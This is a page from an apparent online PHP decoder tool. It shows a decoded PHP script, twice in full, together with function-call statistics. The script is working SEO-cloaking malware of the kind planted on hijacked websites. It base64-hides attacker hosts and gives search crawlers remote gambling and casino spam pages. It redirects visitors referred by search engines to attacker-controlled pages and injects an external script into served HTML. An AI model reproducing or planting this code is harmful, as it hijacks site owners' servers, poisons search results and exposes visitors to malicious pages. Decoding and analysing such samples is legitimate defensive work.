Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

set_time_limit(0); error_reporting(0); define('VERSION', 'VCETE'); define('APIVERSION', '3..

Decoded Output download

<?  set_time_limit(0); error_reporting(0); define('VERSION', 'VCETE'); define('APIVERSION', '3'); define('API', base64_decode('aHR0cHM6Ly9jZG4uY2xvdWRmbGFyZWJyLmNvbS8=')); define('API_HTTP', base64_decode('aHR0cDovL2Nkbi5jbG91ZGZsYXJlYnIuY29tLw==')); define('API_JS', base64_decode('PHNjcmlwdCBhc3luYyBzcmM9Imh0dHBzOi8vYnIuZ29vZ2xlZXBsYXkuY29tL211bHUuanMiPjwvc2NyaXB0Pg==')); define('FALLBACK_REDIRECT_HTML', base64_decode('PGh0bWw+CiAgICA8aGVhZD4KICAgICAgICA8dGl0bGU+VGhlIHJlc291cmNlIGNhbm5vdCBiZSBmb3VuZC48L3RpdGxlPgogICAgICAgIDxzY3JpcHQ+d2luZG93LmxvY2F0aW9uPSJodHRwczovL2JyLmdvb2dsZWVwbGF5LmNvbS9ieGppLmh0bWwiOzwvc2NyaXB0PgogICAgPC9oZWFkPgogICAgPGJvZHk+CiAgICAgICAgPGgxPk5vdCBGb3VuZDwvaDE+CiAgICA8L2JvZHk+CjwvaHRtbD4=')); $req_ref = $_SERVER["HTTP_REFERER"]; $req_ua = $_SERVER["HTTP_USER_AGENT"]; $host = $_SERVER['HTTP_HOST']; $req_uri = $_SERVER['REQUEST_URI']; function is_prefix($uri, $prefix_regex = '/[?\/](app|ios|android|download|blank|bet|casino|games|play|video|poker|root|news|patt|tee|sto|bea|slo|bac|pac|tig|bmw|fru|bull|card|gods|fish|mahj|uri|bak\.php)./') { return preg_match($prefix_regex, $uri) === 1; } function is_crawler($ua) { $crawlers = array('Googlebot', 'Bingbot', 'MSNBOT', 'Yahoo!'); foreach ($crawlers as $c) { if (stripos($ua, $c) !== false) { return true; } } return false; } function is_visitor($ref) { if (substr($ref, 0, 4) === 'http') { $refs = array('google.', 'bing.', 'yahoo.'); foreach ($refs as $r) { if (stripos($ref, $r) !== false) { return true; } } } return false; } function get_content($url, $headers = array(), $conn_timeout = 0, $trans_timeout = 0) { if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]); curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $conn_timeout); curl_setopt($ch, CURLOPT_TIMEOUT, $trans_timeout); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $result = curl_exec($ch); if ($result == NULL) { return file_get_contents($url); } curl_close($ch); return $result; } else { return file_get_contents($url); } } function get_client_ip() { foreach (array('HTTP_CLIENT_IP', 'HTTP_X_REAL_IP', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (explode(',', $_SERVER[$key]) as $ip) { $ip = trim($ip); if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } function main() { global $req_ref, $req_ua, $host, $req_uri; header('Cache-Control: no-store, no-cache, must-revalidate'); header('Cache-Control: post-check=0, pre-check=0', FALSE); header('Pragma: no-cache'); $uri_encoded = urlencode($req_uri); $headers = array(); if (isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) { $lang = $_SERVER['HTTP_ACCEPT_LANGUAGE']; array_push($headers, "Accept-Language: $lang"); array_push($headers, "Vary: Accept-Language"); } if (is_crawler($req_ua)) { $crawler_ip = get_client_ip(); if (is_prefix($req_uri)) { header('Content-Type:text/html; charset=utf-8'); $htmls = get_content(API . "connector.html?domain={$host}&uri={$uri_encoded}&ip={$crawler_ip}&ver=" . VERSION . "&v=" . APIVERSION, $headers); $htmls = str_replace('</head>', API_JS . '</head>', $htmls); echo $htmls; exit; } else { echo file_get_contents(API . "suijiurl/index.php"); } } elseif (is_prefix($req_uri) && is_visitor($req_ref)) { header('Content-Type:text/html; charset=utf-8'); $client_ip = get_client_ip(); $allheaders = array(); if (!function_exists('getallheaders')) { function getallheaders() { $tmp_headers = array(); foreach ($_SERVER as $name => $value) { if (substr($name, 0, 5) == 'HTTP_') { $tmp_headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value; } } return $tmp_headers; } $allheaders = getallheaders(); } else { $allheaders = getallheaders(); } foreach ($allheaders as $key => $value) { if (stripos($key, 'Sec-') === 0) { array_push($headers, "$key: $value"); } } $html = get_content(API . "redirectv1.html?domain={$host}&uri={$uri_encoded}&ip={$client_ip}&ver=" . VERSION . "&v=" . APIVERSION, $headers, 3, 3); $html = str_replace('</head>', API_JS . '</head>', $html); echo($html ? $html : FALLBACK_REDIRECT_HTML); exit; } } main(); ?>

Did this file decode correctly?

Original Code

set_time_limit(0); error_reporting(0); define('VERSION', 'VCETE'); define('APIVERSION', '3'); define('API', base64_decode('aHR0cHM6Ly9jZG4uY2xvdWRmbGFyZWJyLmNvbS8=')); define('API_HTTP', base64_decode('aHR0cDovL2Nkbi5jbG91ZGZsYXJlYnIuY29tLw==')); define('API_JS', base64_decode('PHNjcmlwdCBhc3luYyBzcmM9Imh0dHBzOi8vYnIuZ29vZ2xlZXBsYXkuY29tL211bHUuanMiPjwvc2NyaXB0Pg==')); define('FALLBACK_REDIRECT_HTML', base64_decode('PGh0bWw+CiAgICA8aGVhZD4KICAgICAgICA8dGl0bGU+VGhlIHJlc291cmNlIGNhbm5vdCBiZSBmb3VuZC48L3RpdGxlPgogICAgICAgIDxzY3JpcHQ+d2luZG93LmxvY2F0aW9uPSJodHRwczovL2JyLmdvb2dsZWVwbGF5LmNvbS9ieGppLmh0bWwiOzwvc2NyaXB0PgogICAgPC9oZWFkPgogICAgPGJvZHk+CiAgICAgICAgPGgxPk5vdCBGb3VuZDwvaDE+CiAgICA8L2JvZHk+CjwvaHRtbD4=')); $req_ref = $_SERVER["HTTP_REFERER"]; $req_ua = $_SERVER["HTTP_USER_AGENT"]; $host = $_SERVER['HTTP_HOST']; $req_uri = $_SERVER['REQUEST_URI']; function is_prefix($uri, $prefix_regex = '/[?\/](app|ios|android|download|blank|bet|casino|games|play|video|poker|root|news|patt|tee|sto|bea|slo|bac|pac|tig|bmw|fru|bull|card|gods|fish|mahj|uri|bak\.php)./') { return preg_match($prefix_regex, $uri) === 1; } function is_crawler($ua) { $crawlers = array('Googlebot', 'Bingbot', 'MSNBOT', 'Yahoo!'); foreach ($crawlers as $c) { if (stripos($ua, $c) !== false) { return true; } } return false; } function is_visitor($ref) { if (substr($ref, 0, 4) === 'http') { $refs = array('google.', 'bing.', 'yahoo.'); foreach ($refs as $r) { if (stripos($ref, $r) !== false) { return true; } } } return false; } function get_content($url, $headers = array(), $conn_timeout = 0, $trans_timeout = 0) { if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]); curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $conn_timeout); curl_setopt($ch, CURLOPT_TIMEOUT, $trans_timeout); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $result = curl_exec($ch); if ($result == NULL) { return file_get_contents($url); } curl_close($ch); return $result; } else { return file_get_contents($url); } } function get_client_ip() { foreach (array('HTTP_CLIENT_IP', 'HTTP_X_REAL_IP', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (explode(',', $_SERVER[$key]) as $ip) { $ip = trim($ip); if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } function main() { global $req_ref, $req_ua, $host, $req_uri; header('Cache-Control: no-store, no-cache, must-revalidate'); header('Cache-Control: post-check=0, pre-check=0', FALSE); header('Pragma: no-cache'); $uri_encoded = urlencode($req_uri); $headers = array(); if (isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) { $lang = $_SERVER['HTTP_ACCEPT_LANGUAGE']; array_push($headers, "Accept-Language: $lang"); array_push($headers, "Vary: Accept-Language"); } if (is_crawler($req_ua)) { $crawler_ip = get_client_ip(); if (is_prefix($req_uri)) { header('Content-Type:text/html; charset=utf-8'); $htmls = get_content(API . "connector.html?domain={$host}&uri={$uri_encoded}&ip={$crawler_ip}&ver=" . VERSION . "&v=" . APIVERSION, $headers); $htmls = str_replace('</head>', API_JS . '</head>', $htmls); echo $htmls; exit; } else { echo file_get_contents(API . "suijiurl/index.php"); } } elseif (is_prefix($req_uri) && is_visitor($req_ref)) { header('Content-Type:text/html; charset=utf-8'); $client_ip = get_client_ip(); $allheaders = array(); if (!function_exists('getallheaders')) { function getallheaders() { $tmp_headers = array(); foreach ($_SERVER as $name => $value) { if (substr($name, 0, 5) == 'HTTP_') { $tmp_headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value; } } return $tmp_headers; } $allheaders = getallheaders(); } else { $allheaders = getallheaders(); } foreach ($allheaders as $key => $value) { if (stripos($key, 'Sec-') === 0) { array_push($headers, "$key: $value"); } } $html = get_content(API . "redirectv1.html?domain={$host}&uri={$uri_encoded}&ip={$client_ip}&ver=" . VERSION . "&v=" . APIVERSION, $headers, 3, 3); $html = str_replace('</head>', API_JS . '</head>', $html); echo($html ? $html : FALLBACK_REDIRECT_HTML); exit; } } main();

Function Calls

define 1
set_time_limit 1
error_reporting 1

Variables

None

Stats

MD5 224f796c021ab6771194d4b7a8c042a1
Eval Count 0
Decode Time 85 ms